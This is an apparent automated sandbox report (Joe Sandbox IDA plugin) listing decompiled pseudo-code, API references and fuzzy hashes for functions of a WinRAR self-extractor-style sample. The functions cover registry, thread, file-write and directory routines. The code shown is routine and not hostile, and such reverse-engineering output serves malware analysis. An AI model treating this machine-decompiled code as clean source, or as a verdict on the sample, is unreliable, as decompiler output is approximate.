Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 2299da6804b97bdf835bb0660d257d08bd7721815d7613b4846658428775cb2b
Instruction ID: 09f9caf78bb7ac14060bc18dc6d010c39306ef4c8cf353545f88f2528b38cb8e
Opcode Fuzzy Hash: 2299da6804b97bdf835bb0660d257d08bd7721815d7613b4846658428775cb2b
Instruction Fuzzy Hash: 40117334580104AFCB209BA1E805A793BEDEB017F5F10E12BF86AF5192E7359D44DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00E8B497 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00E8B497(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E00E892B5(__ebx, __ecx, __edx);
				E00E8B5BE(__ebx, __ecx, __edx, _t81);
				_t31 = E00E8B22B(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t70 = E00E88838(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E00E8B660(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00E885EF();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xe9eb20;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0xe9eb20) {
								E00E887FE( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0xe9eda0 & 0x00000001;
							if(( *0xe9eda0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E00E8B101(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0xe9ed40; // 0x30a20e8
									 *0xe9e814 = _t44;
								}
							}
						}
						L6:
						E00E887FE(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E00E88C7A())) = 0x16;
						goto L5;
					}
				}
			}

0x00e8b497
0x00e8b4a4
0x00e8b4a7
0x00e8b4af
0x00e8b4b8
0x00e8b4bb
0x00e8b4c1
0x00000000
0x00e8b4c3
0x00e8b4c7
0x00e8b4d4
0x00e8b4d6
0x00e8b4da
0x00e8b4dc
0x00e8b50c
0x00e8b50c
0x00000000
0x00e8b4de
0x00e8b4eb
0x00e8b4f1
0x00e8b4f4
0x00e8b4f9
0x00e8b4fd
0x00e8b4ff
0x00e8b51e
0x00e8b522
0x00e8b524
0x00e8b524
0x00e8b52f
0x00e8b533
0x00e8b534
0x00e8b536
0x00e8b539
0x00e8b540
0x00e8b545
0x00e8b54a
0x00e8b540
0x00e8b54b
0x00e8b551
0x00e8b556
0x00e8b558
0x00e8b55b
0x00e8b55e
0x00e8b565
0x00e8b567
0x00e8b56e
0x00e8b573
0x00e8b57c
0x00e8b581
0x00e8b587
0x00e8b589
0x00e8b58e
0x00e8b58e
0x00e8b587
0x00e8b56e
0x00e8b50e
0x00e8b50f
0x00000000
0x00e8b501
0x00e8b506
0x00000000
0x00e8b506
0x00e8b4ff

APIs

Part of subcall function 00E892B5: GetLastError.KERNEL32(?,00EA0F50,00E840E4,00EA0F50,?,?,00E83B5F,?,?,00EA0F50), ref: 00E892B9
Part of subcall function 00E892B5: _free.LIBCMT ref: 00E892EC
Part of subcall function 00E892B5: SetLastError.KERNEL32(00000000,?,00EA0F50), ref: 00E8932D
Part of subcall function 00E892B5: _abort.LIBCMT ref: 00E89333

Part of subcall function 00E8B5BE: _abort.LIBCMT ref: 00E8B5F0
Part of subcall function 00E8B5BE: _free.LIBCMT ref: 00E8B624

Part of subcall function 00E8B22B: GetOEMCP.KERNEL32(00000000,?,?,00E8B4B4,?), ref: 00E8B256

_free.LIBCMT ref: 00E8B50F
_free.LIBCMT ref: 00E8B545

Strings

, xrefs: 00E8B539

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-3162483948
Opcode ID: f5f53bed5d1e3d7fefa1a10aa83a7092c30161544d501ffdb828462c330970e6
Instruction ID: 3c9282284fb94f808038beedc977d9bf899aeffb1d84c634a13cbbe3bc7587ba
Opcode Fuzzy Hash: f5f53bed5d1e3d7fefa1a10aa83a7092c30161544d501ffdb828462c330970e6
Instruction Fuzzy Hash: 37319331D04108AFDB10FFA9D541BA9B7E6EF41324F25509AE91CBB2A1EB329E41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E8A768 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E00E8A768(signed int _a4, CHAR* _a8, intOrPtr* _a12, char _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xec1630 + _a4 * 4;
				_t27 =  *0xe9e668; // 0x8ae5c3d8
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					_t5 =  &_a16; // 0xe83b5f
					if(_t34 ==  *_t5) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xe9e668; // 0x8ae5c3d8
							goto L13;
						}
						 *_t20 = E00E83429(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00E8A804( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						_t6 =  &_a16; // 0xe83b5f
						if(_t34 !=  *_t6) {
							continue;
						}
						_t27 =  *0xe9e668; // 0x8ae5c3d8
						goto L7;
					}
					_t27 =  *0xe9e668; // 0x8ae5c3d8
					goto L8;
				}
				L2:
				return _t33;
			}

0x00e8a773
0x00e8a77c
0x00e8a782
0x00e8a78c
0x00e8a78e
0x00e8a792
0x00e8a7fd
0x00000000
0x00e8a7fd
0x00e8a796
0x00e8a79c
0x00e8a79f
0x00e8a7a2
0x00e8a7be
0x00e8a7be
0x00e8a7c0
0x00e8a7c2
0x00e8a7ed
0x00e8a7ef
0x00e8a7f7
0x00e8a7fb
0x00000000
0x00e8a7fb
0x00e8a7ce
0x00e8a7d2
0x00e8a7e7
0x00000000
0x00e8a7e7
0x00e8a7db
0x00000000
0x00000000
0x00000000
0x00000000
0x00e8a7a4
0x00e8a7a4
0x00e8a7a6
0x00e8a7ae
0x00000000
0x00000000
0x00e8a7b0
0x00e8a7b3
0x00e8a7b6
0x00000000
0x00000000
0x00e8a7b8
0x00000000
0x00e8a7b8
0x00e8a7df
0x00000000
0x00e8a7df
0x00e8a798
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00E8A7C8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E8A7D5

Strings

_;, xrefs: 00E8A79F, 00E8A7B3, 00E8A7A4

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID: _;
API String ID: 2279764990-796408444
Opcode ID: deddd59e4efeca65a143f6f746c80cf6b8f9213fe7c821faf5da8a05bd8b72e4
Instruction ID: ba26db1fb43b3ba71c9d9eb1ae43f52040e8405457cf8b625cedf82425210b80
Opcode Fuzzy Hash: deddd59e4efeca65a143f6f746c80cf6b8f9213fe7c821faf5da8a05bd8b72e4
Instruction Fuzzy Hash: BE112337A105209FBB22EE29DC4089A73A59B80B2871E0233FD1DBB244D632DC41A7D2

Uniqueness

Uniqueness Score: -1.00%

Function 00E7AB60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
registryCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E00E7AB60(intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				void* _v12;
				char _v16;
				char _v4112;
				char _v8208;
				long _t19;
				signed int _t30;
				void* _t35;

				_t19 = 0x200c;
				E00E7E630();
				_t36 =  *0xeaa470;
				if( *0xeaa470 != 0) {
					E00E7C040(_t36, _a4,  &_v8208, 0x800);
					_t19 = RegOpenKeyExW(0x80000001, L"Software\\WinRAR SFX", 0, 1,  &_v12); // executed
					if(0x200c == 0) {
						_v8 = 0x1000;
						_push( &_v8);
						_push( &_v4112);
						_push( &_v16);
						_push(0);
						_push( &_v8208);
						_push(_v12);
						if( *0xec2024() == 0) {
							_t30 = _v8 >> 1;
							_v8 = _t30;
							if(_t30 >= 0x7ff) {
								_t30 = 0x7ff;
							}
							 *((short*)(_t35 + _t30 * 2 - 0x100c)) = 0;
							E00E70131(_a4,  &_v4112, _a8);
						}
						return RegCloseKey(_v12);
					}
				}
				return _t19;
			}

0x00e7ab63
0x00e7ab68
0x00e7ab6d
0x00e7ab74
0x00e7ab89
0x00e7aba0
0x00e7aba8
0x00e7abad
0x00e7abb4
0x00e7abbb
0x00e7abbf
0x00e7abc0
0x00e7abc8
0x00e7abc9
0x00e7abd4
0x00e7abde
0x00e7abe0
0x00e7abe5
0x00e7abe7
0x00e7abe7
0x00e7abee
0x00e7ac00
0x00e7ac00
0x00000000
0x00e7ac08
0x00e7aba8
0x00e7ac11

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\WinRAR SFX,00000000,00000001,?,?,?,00000800), ref: 00E7ABA0
RegCloseKey.ADVAPI32(?), ref: 00E7AC08

Strings

Software\WinRAR SFX, xrefs: 00E7AB96

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: CloseOpen
String ID: Software\WinRAR SFX
API String ID: 47109696-754673328
Opcode ID: 8918cfdbd8993343b33bf5c5680675bf137a1d5259084f7ca4258db835df0a95
Instruction ID: 2505081e96e324733892626da3903bdb1cec2ba52d0067b804371e0a5caabce7
Opcode Fuzzy Hash: 8918cfdbd8993343b33bf5c5680675bf137a1d5259084f7ca4258db835df0a95
Instruction Fuzzy Hash: E711FB7554020CFEEB129B94DD45FEEB7BDEB08300F1081A6BA08F6150DBB19A48DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E70B64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00E70B64() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				void* _t7;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0xea0f50 > 0) {
					_t18 = 0xea0f54;
					do {
						_t7 = CreateThread(0, 0x10000, E00E70CA0, 0xea0f50, 0,  &_v4); // executed
						_t22 = _t7;
						_t25 = _t22;
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0xea0f50);
							E00E66E68(0xea0f50);
							E00E66E63(E00E67002(_t25), 0xea0f50, 0xea0f50, 2);
						}
						 *_t18 = _t22;
						 *0x00EA1054 =  *((intOrPtr*)(0xea1054)) + 1;
						_t8 =  *0xea81d8; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0xea0f50);
					return _t8;
				}
				return _t5;
			}

0x00e70b69
0x00e70b6d
0x00e70b71
0x00e70b74
0x00e70b88
0x00e70b8e
0x00e70b90
0x00e70b92
0x00e70b94
0x00e70b99
0x00e70b9e
0x00e70bb6
0x00e70bb6
0x00e70bbb
0x00e70bbd
0x00e70bc3
0x00e70bca
0x00e70bcf
0x00e70bcf
0x00e70bd5
0x00e70bd6
0x00e70bd9
0x00000000
0x00e70bde
0x00e70be2

APIs

CreateThread.KERNELBASE ref: 00E70B88
SetThreadPriority.KERNEL32(?,00000000), ref: 00E70BCF

Part of subcall function 00E66E68: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E66E86

Strings

CreateThread failed, xrefs: 00E70B94

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 585a03a7fd582fe15084f4b0f17c22574944330fbcd081a05873ec907aeca700
Instruction ID: efea13f9d5f205ddbddb5eaf230e810c2113e5a6c474938776e3c90c9c69a9ff
Opcode Fuzzy Hash: 585a03a7fd582fe15084f4b0f17c22574944330fbcd081a05873ec907aeca700
Instruction Fuzzy Hash: 2B01F9B5344305AFD6245F64FC82F627398EB45755F20252EF58AB6180CAE1BD408620

Uniqueness

Uniqueness Score: -1.00%

Function 00E83567 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00E83567(void* __eflags, char _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E00E83446(4, "FlsAlloc", 0xe95684, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				_t1 =  &_a4; // 0xe82340
				L00E7EFA0();
				return  *_t6( *_t1);
			}

0x00e8357c
0x00e83581
0x00e83588
0x00e8359b
0x00e8359b
0x00e8358a
0x00e8358f
0x00e83598

APIs

try_get_function.LIBVCRUNTIME ref: 00E8357C

Strings

FlsAlloc, xrefs: 00E8356B, 00E83575
@#, xrefs: 00E8358A

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: try_get_function
String ID: @#$FlsAlloc
API String ID: 2742660187-2180231919
Opcode ID: 38aa96abc1fe18e285852027d4146643ec63e967f927836cf78584a133cd544c
Instruction ID: a8525ebab6eb287863ca57b10317556ad96d79b9fbe51747b8b4078befd61e25
Opcode Fuzzy Hash: 38aa96abc1fe18e285852027d4146643ec63e967f927836cf78584a133cd544c
Instruction Fuzzy Hash: C9D05B637817246BD91233A56C029DD7A558701FB6F451162FF0C7E243D555461043D5

Uniqueness

Uniqueness Score: -1.00%

Function 00E6A0CF Relevance: 4.6, APIs: 3, Instructions: 107
fileCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00E6A0CF(void* __edx, void* _a4, long _a8) {
				char _v4;
				long _v8;
				void* __ecx;
				void* __ebp;
				int _t28;
				intOrPtr _t31;
				long _t36;
				int _t39;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t50;
				void* _t58;
				intOrPtr _t62;
				void* _t66;
				long _t68;

				_t58 = __edx;
				_t68 = _a8;
				_t49 = _t50;
				if(_t68 != 0) {
					if( *((intOrPtr*)(_t49 + 0xc)) == 1) {
						 *(_t49 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						do {
							_v8 = _v8 & 0x00000000;
							_v4 = 0;
							if( *((intOrPtr*)(_t49 + 0xc)) == 0) {
								_t28 = WriteFile( *(_t49 + 4), _a4, _t68,  &_v8, 0); // executed
								asm("sbb al, al");
								_t31 =  ~(_t28 - 1) + 1;
								_v4 = _t31;
								L14:
								if(_t31 != 0) {
									L22:
									 *((char*)(_t49 + 8)) = 1;
									return _v4;
								}
								L15:
								if( *((char*)(_t49 + 0x1a)) == 0 ||  *((intOrPtr*)(_t49 + 0xc)) != 0) {
									goto L22;
								} else {
									_t65 = _t49 + 0x24;
									if(E00E66DDC(0xea0f50, _t49 + 0x24, 0) == 0) {
										E00E670D6(0xea0f50, _t68, 0, _t65);
										goto L22;
									}
									goto L18;
								}
							}
							_t66 = 0;
							if(_t68 == 0) {
								goto L15;
							} else {
								goto L8;
							}
							while(1) {
								L8:
								_t36 = _t68 - _t66;
								if(_t36 >= 0x4000) {
									_t36 = 0x4000;
								}
								_t39 = WriteFile( *(_t49 + 4), _a4 + _t66, _t36,  &_v8, 0);
								asm("sbb al, al");
								_t31 =  ~(_t39 - 1) + 1;
								_v4 = _t31;
								if(_t31 == 0) {
									goto L15;
								}
								_t66 = _t66 + 0x4000;
								if(_t66 < _t68) {
									continue;
								}
								goto L14;
							}
							goto L15;
							L18:
						} while (_v8 >= _t68 || _v8 <= 0);
						_t62 =  *_t49;
						 *0xe93260(0);
						_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14))))();
						asm("sbb edx, 0x0");
						 *0xe93260(_t43 - _v8, _t58);
						 *((intOrPtr*)(_t62 + 0x10))();
					}
				}
				return 1;
			}

0x00e6a0cf
0x00e6a0d3
0x00e6a0d7
0x00e6a0db
0x00e6a0e8
0x00e6a0f2
0x00e6a0f2
0x00e6a0f7
0x00e6a0fc
0x00e6a0fc
0x00e6a105
0x00e6a10a
0x00e6a158
0x00e6a161
0x00e6a163
0x00e6a165
0x00e6a169
0x00e6a16b
0x00e6a1de
0x00e6a1e3
0x00000000
0x00e6a1e7
0x00e6a16d
0x00e6a171
0x00000000
0x00e6a179
0x00e6a17b
0x00e6a18b
0x00e6a1d9
0x00000000
0x00e6a1d9
0x00000000
0x00e6a18b
0x00e6a171
0x00e6a10c
0x00e6a110
0x00000000
0x00000000
0x00000000
0x00000000
0x00e6a112
0x00e6a112
0x00e6a114
0x00e6a118
0x00e6a11a
0x00e6a11a
0x00e6a12e
0x00e6a137
0x00e6a139
0x00e6a13b
0x00e6a13f
0x00000000
0x00000000
0x00e6a141
0x00e6a145
0x00000000
0x00000000
0x00000000
0x00e6a147
0x00000000
0x00e6a18d
0x00e6a18d
0x00e6a1a2
0x00e6a1ab
0x00e6a1b3
0x00e6a1bc
0x00e6a1c1
0x00e6a1c9
0x00e6a1c9
0x00e6a0f7
0x00000000

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00E6CE98,00000001,?,?,?,00000000,00E7510E,?,?,?), ref: 00E6A0EC
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00E7510E,?,?,?,?,?,00E74BB3,?), ref: 00E6A12E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00E6CE98,00000001,?,?), ref: 00E6A158

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: f2a9dd30e3eeb646b0755874ac84075a31bf899480b0d062aec86d56feebf1aa
Instruction ID: 1dae76d811e57710693d43edd5de703c283cb7b4bc381f8e6e5bd2880aa74cce
Opcode Fuzzy Hash: f2a9dd30e3eeb646b0755874ac84075a31bf899480b0d062aec86d56feebf1aa
Instruction Fuzzy Hash: DA31E370A483059FDB109F24E848767BBA4EB42794F08552AE841BB181C761ED48CFA3

Uniqueness

Uniqueness Score: -1.00%

Function 00E6A3FA Relevance: 4.6, APIs: 3, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E6A3FA(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E00E7E630();
				_t21 = _a4;
				_t8 =  *(E00E6BE6D(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E00E6A373(_t21) != 0 || E00E6B85C(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E00E6A637(_t21, _a12);
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}

0x00e6a402
0x00e6a408
0x00e6a411
0x00e6a417
0x00e6a42b
0x00e6a433
0x00e6a471
0x00e6a477
0x00e6a47a
0x00e6a486
0x00e6a488
0x00e6a47c
0x00e6a47c
0x00e6a47f
0x00000000
0x00e6a481
0x00e6a483
0x00e6a483
0x00e6a47f
0x00000000
0x00000000
0x00000000
0x00e6a41e
0x00e6a421
0x00e6a429
0x00e6a45e
0x00e6a462
0x00e6a468
0x00e6a468
0x00e6a46d
0x00000000
0x00000000
0x00000000
0x00e6a429
0x00e6a48d

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00E6A2B3,?,00000001,00000000,?,?), ref: 00E6A421
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00E6A2B3,?,00000001,00000000,?,?), ref: 00E6A454
GetLastError.KERNEL32(?,?,?,?,00E6A2B3,?,00000001,00000000,?,?), ref: 00E6A471

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: 8e0a6781422db1f6c1c6d91293496d887d9fa32431af4676d503a478ea0c9c5b
Instruction ID: f9e4fde5021bad5cb946549f41edeefaea53c39812123eef6a8f24f2215539b1
Opcode Fuzzy Hash: 8e0a6781422db1f6c1c6d91293496d887d9fa32431af4676d503a478ea0c9c5b
Instruction Fuzzy Hash: 3401D23598015469DB21AAB47C4DBFE778CAF063C4F0CA462F950F2092CF90C9818EA3

Uniqueness

Uniqueness Score: -1.00%

Function 00E7ADBE Relevance: 4.5, APIs: 3, Instructions: 47COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 00E7ADC8
SHGetFolderLocation.SHELL32(00000000,?,00000000,00000000,?), ref: 00E7ADDA
SHGetPathFromIDListW.SHELL32(?,?), ref: 00E7ADF2

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: FolderFromListLocationMallocPath
String ID:
API String ID: 1884932940-0
Opcode ID: 94434bfb605363daece8c09233a4bd0b4283a7f8192fb8ad37d118f01d6b1c96
Instruction ID: 4ff58125cd181d17cd825c9175f163c1c8eba58de1bcbc764140607a4fb6a970
Opcode Fuzzy Hash: 94434bfb605363daece8c09233a4bd0b4283a7f8192fb8ad37d118f01d6b1c96
Instruction Fuzzy Hash: CF014B75644118FFCF019FA5DC49CEE7B6DEB08300B00416AF90AE7220DA32AA59DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E7C9A9 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 280
